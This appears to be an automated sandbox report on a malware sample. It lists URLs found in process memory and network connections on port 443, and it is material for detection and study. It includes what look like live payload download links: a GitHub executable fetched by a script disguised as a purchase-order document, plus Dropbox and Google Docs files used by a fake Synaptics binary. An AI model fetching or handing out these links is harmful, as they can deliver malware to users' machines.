                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniV
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenib
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni~
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtnam
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtnam-
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtname
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadty
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3102248481.000000003DB63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduld.j
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadunamaA
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurN
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.P
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv8
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadver
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw0
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwX
                                Source: Synaptics.exe, 00000008.00000002.3048928487.00000000233BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx1
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx;x
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxuZV
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                                Source: Synaptics.exe, 00000008.00000003.2026291010.00000000075D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadySi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.6
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.I
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.O
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.q
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.w
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzM
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000008.00000002.2977437745.000000000755B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userco
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/3
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/L
                                Source: Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC6E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/nect
                                Source: wscript.exe, 00000000.00000002.1763617544.0000022996F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.compG
                                Source: wscript.exe, 00000000.00000002.1763687744.0000022996F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762802968.0000022996F3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                                Source: wscript.exe, 00000000.00000002.1763687744.0000022996F42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1762802968.0000022996F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/$
                                Source: wscript.exe, 00000000.00000002.1763508004.000002299493F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1761565226.000002299493A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/;
                                Source: wscript.exe, wscript.exe, 00000000.00000002.1763555478.0000022994AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763602606.0000022996DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1763617544.0000022996EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main
                                Source: wscript.exe, 00000000.00000003.1762200074.000002299491D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order No. G02873362-Docx.vbsString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe
                                Source: wscript.exe, 00000000.00000002.1763617544.0000022996F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exe_
                                Source: wscript.exe, 00000000.00000002.1763617544.0000022996F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/RNEQTT.exeu
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=T
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                                Source: update.exe, 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
